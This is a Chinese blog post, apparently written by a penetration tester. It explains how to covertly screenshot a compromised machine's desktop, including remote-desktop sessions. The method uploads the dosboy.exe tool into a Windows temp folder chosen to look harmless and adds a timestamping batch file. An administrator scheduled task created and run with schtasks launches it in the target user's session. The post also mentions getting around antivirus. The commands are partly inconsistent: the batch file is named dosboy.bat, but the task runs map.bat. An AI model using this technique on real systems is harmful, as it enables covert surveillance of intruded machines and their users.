嗯,有时候 有时候,我们要目标的屏幕,我们的Cobalt Strike和Metasploit的截图功能都凉了,我们就可以自己上传一个上去截图,搜索找到dosboy这个截图工具,大小6kb,cmd下操作的。

  1. 正常操作
    dosboy.exe exp.bmp
    但素,如果目标不是直接在物理机登陆,而是通过远程桌面连接登陆操作的,这个姿势就只能截到一片黑麻麻的我也不知道是什么东西的图片文件,跟你闭上眼睛看到的一样。
  2. 骚操作

    我们要截到目标通过远程桌面登陆过的桌面操作的情况,就需要一点小小的姿势了,这个是轰天大佬的思路的延伸。他说截屏的话要注入到目标用户的进程,这半身就是难点一个,加上有杀软,就更加凉凉,以可以通过放置录屏工具到目标用户的启动项目录来启动录屏。 至此我就想到了用schtasks来让目标用户来启动我们的程序,嗯,实验结果显示此姿势完成可行。

    dosboy.bat的内容
    @echo off 
    set a=%Date:~0,4%%Date:~5,2%%Date:~8,2%%time:~0,2%%time:~3,2%%time:~6,2%
    c:\windows\temp\Crashpad\reports\dosboy.exe c:\windows\temp\Crashpad\reports\%a%
    
    把dosboy放在c:\windows\temp\Crashpad\reports\
    
    写入任务计划
    
    schtasks /create /ru administrator /tn n /sc daily /tr "c:\windows\temp\Crashpad\reports\map.bat" /f 
    schtasks /run /tn n /i
    

    事实证明,用bat来执行是不行的,这里的不行并不是不能截图,而是截到的图会出现一个黑框框,这个黑框框就是bat运行时出现的,一闪而过,但是dosboy.exe刚好就是那一瞬间截图,所以这个办法就凉了。要想你的图片以时间命名就得自己写个软件来启动截图软件并传入一个时间参数了,你可以找开发来写。我呢就不开发了。

更加具体的操作,自己领悟!

发表评论

电子邮件地址不会被公开。 必填项已用*标注